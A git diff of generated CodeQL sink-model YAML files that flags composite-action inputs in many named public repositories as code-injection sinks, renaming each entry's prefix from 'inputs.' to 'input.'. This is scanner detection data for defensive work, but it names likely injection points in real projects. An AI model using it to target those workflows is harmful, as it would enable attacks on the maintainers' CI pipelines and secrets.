diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 8d10d22cd5c0..13c0093fe4ac 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["department-of-veterans-affairs/vets-website", "*", "inputs.delimiter", "code-injection", "generated"] \ No newline at end of file + - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index c99c630853e3..49b226de1e80 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["devexpress/devextreme", "*", "inputs.name", "code-injection", "generated"] - - ["devexpress/devextreme", "*", "inputs.result", "code-injection", "generated"] - - ["devexpress/devextreme", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 8554ebec65fa..9a6e0b88ba2c 100644 
--- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["diggerhq/digger", "*", "inputs.checkov-version", "code-injection", "generated"] - - ["diggerhq/digger", "*", "inputs.google-auth-credentials", "code-injection", "generated"] - - ["diggerhq/digger", "*", "inputs.google-workload-identity-provider", "code-injection", "generated"] - - ["diggerhq/digger", "*", "inputs.google-service-account", "code-injection", "generated"] \ No newline at end of file + - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-workload-identity-provider", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-service-account", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 6f0878a77cbd..4f88855a5616 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["diku-dk/futhark", "*", "inputs.script", "code-injection", "generated"] - - ["diku-dk/futhark", "*", "inputs.slurm-options", "code-injection", "generated"] \ No newline at end of file + - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] + - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 198109f790c1..5683d28567f4 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["discourse/.github", "*", "inputs.about_json_path", "code-injection", "generated"] \ No newline at end of file + - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index e634eaa38a2c..424c7241bcfc 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dnsjava/dnsjava", "*", "inputs.name", "code-injection", "generated"] - - ["dnsjava/dnsjava", "*", "inputs.filename", "code-injection", "generated"] - - ["dnsjava/dnsjava", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index e26ba9755d04..37295f2cf6c0 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dotintent/react-native-ble-plx", "*", "inputs.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file + - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index 2cda1936f016..e7c767d2dce1 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dotnet/docs-tools", "*", "inputs.support", "code-injection", "generated"] \ No newline at end of file + - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index f83cf533944e..7f78690f6396 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dotnet/dotnet-monitor", "*", "inputs.files_to_commit", "code-injection", "generated"] \ No newline at end of file + - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index 5af04ac6ac70..ba1beace1704 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dragonflydb/dragonfly", "*", "inputs.gspace-secret", "code-injection", "generated"] - - ["dragonflydb/dragonfly", "*", "inputs.filter", "code-injection", "generated"] - - ["dragonflydb/dragonfly", "*", "inputs.dfly-executable", "code-injection", "generated"] - - ["dragonflydb/dragonfly", "*", "inputs.build-folder-name", "code-injection", "generated"] \ No newline at end of file + - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.dfly-executable", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.build-folder-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index 0d0cae87e09d..d6ee6c8bb7d2 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eksctl-io/eksctl", "*", "inputs.token", "code-injection", "generated"] - - ["eksctl-io/eksctl", "*", "inputs.email", "code-injection", "generated"] - - ["eksctl-io/eksctl", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "input.name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 070b502e1889..83951f43c635 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elastic/apm-agent-dotnet", "*", "inputs.project", "code-injection", "generated"] - - ["elastic/apm-agent-dotnet", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] + - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index 6c0cf90523ac..397ab0838090 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elastic/apm-agent-java", "*", "inputs.tag", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.path", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.name", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.test-java-version", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.name", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.test-java-version", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index ca6459221d4b..5dd069df4990 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elementor/elementor", "*", "inputs.README_TXT_PATH", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.CHANNEL", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.PACKAGE_VERSION", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.MESSAGE", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.SLACK_TOKEN", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.SLACK_CHANNELS", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.PRERELEASE", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.TAG_NAME", "code-injection", "generated"] \ No newline at end of file + - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.PACKAGE_VERSION", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.MESSAGE", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.SLACK_TOKEN", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.SLACK_CHANNELS", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.PRERELEASE", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.TAG_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 79d14b65bccc..1a1d763d6e4a 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["emberjs/data", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file + - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index 69771693787d..a8e95d304576 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["emqx/emqx", "*", "inputs.profile", "code-injection", "generated"] - - ["emqx/emqx", "*", "inputs.otp", "code-injection", "generated"] - - ["emqx/emqx", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] + - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] + - ["emqx/emqx", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index a5a3cfbb1c99..52d085ee4798 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eonasdan/tempus-dominus", "*", "inputs.VERSION", "code-injection", "generated"] - - ["eonasdan/tempus-dominus", "*", "inputs.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file + - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] + - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 2000f5d9d00c..33c56a67cb9b 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["erlang/otp", "*", "inputs.TYPE", "code-injection", "generated"] - - ["erlang/otp", "*", "inputs.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file + - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] + - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 95164c659ed5..258101eecea4 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["esphome/esphome", "*", "inputs.target", "code-injection", "generated"] - - ["esphome/esphome", "*", "inputs.suffix", "code-injection", "generated"] - - ["esphome/esphome", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] + - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] + - ["esphome/esphome", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index 7e3b5e4caf60..d77e05c680bc 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expensify/app", "*", "inputs.GPG_PASSPHRASE", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.PATH_ENV_FILE", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file + - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] + - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] + - ["expensify/app", "*", "input.PATH_ENV_FILE", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "input.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index f335170dc854..db98f8d769af 100644 
--- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expo/expo", "*", "inputs.ndk-version", "code-injection", "generated"] \ No newline at end of file + - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 555fa42a79cc..7607840dbdc7 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expo/vscode-expo", "*", "inputs.command", "code-injection", "generated"] - - ["expo/vscode-expo", "*", "inputs.semver", "code-injection", "generated"] - - ["expo/vscode-expo", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index 8fd9440729f6..2fa4f8dfa618 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["external-secrets/external-secrets", "*", "inputs.image-tag", "code-injection", "generated"] - - ["external-secrets/external-secrets", "*", "inputs.image-name", "code-injection", "generated"] \ No newline at end of file + - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index f9479e11aabf..80725157e338 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/buck2", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 711eabc2bfa5..9d317f14272c 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/flow", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 745f89d8677b..12deff387bdc 100644 
--- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebook/yoga", "*", "inputs.version", "code-injection", "generated"] - - ["facebook/yoga", "*", "inputs.directory", "code-injection", "generated"] \ No newline at end of file + - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] + - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index a732e2fac3f0..9c3c242b1ed9 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["facebookresearch/xformers", "*", "inputs.arch", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.pytorch_channel", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.pytorch_version", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.python", "code-injection", "generated"] - - ["facebookresearch/xformers", "*", "inputs.cuda", "code-injection", "generated"] \ No newline at end of file + - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.pytorch_version", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.python", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "input.cuda", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 1aebd1199a5a..4aa1ce5c4cf9 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["fastly/compute-actions", "*", "inputs.fastly-api-token", "code-injection", "generated"] \ No newline at end of file + - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 708adf528f29..6f8ef16ea330 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["felangel/bloc", "*", "inputs.coverage_excludes", "code-injection", "generated"] - - ["felangel/bloc", "*", "inputs.analyze_directories", "code-injection", "generated"] - - ["felangel/bloc", "*", "inputs.report_on", "code-injection", "generated"] - - ["felangel/bloc", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file + - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.report_on", "code-injection", "generated"] + - ["felangel/bloc", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index 18c02da44431..bc2146921efe 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["firebase/firebase-ios-sdk", "*", "inputs.min-ios-version", "code-injection", "generated"] - - ["firebase/firebase-ios-sdk", "*", "inputs.sources", "code-injection", "generated"] - - ["firebase/firebase-ios-sdk", "*", "inputs.pods", "code-injection", "generated"] - - ["firebase/firebase-ios-sdk", "*", "inputs.notices-path", "code-injection", "generated"] \ No newline at end of file + - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.pods", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "input.notices-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index c0a44fae7498..eabd3834b1b7 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flaxengine/flaxengine", "*", "inputs.vulkan-version", "code-injection", "generated"] \ No newline at end of file + - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index af0f474bfaef..2253e33b950c 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-version", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-target", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-api", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-api-token", "code-injection", "generated"] - - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-url", "code-injection", "generated"] \ No newline at end of file + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-api", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.catalog-api-token", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "input.catalog-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index 731ecd5ab1be..bc1eb54056af 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml 
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["fluxcd/flux2", "*", "inputs.bindir", "code-injection", "generated"]
- - ["fluxcd/flux2", "*", "inputs.token", "code-injection", "generated"]
- - ["fluxcd/flux2", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"]
+ - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"]
+ - ["fluxcd/flux2", "*", "input.version", "code-injection", "generated"]
\ No newline at end of file
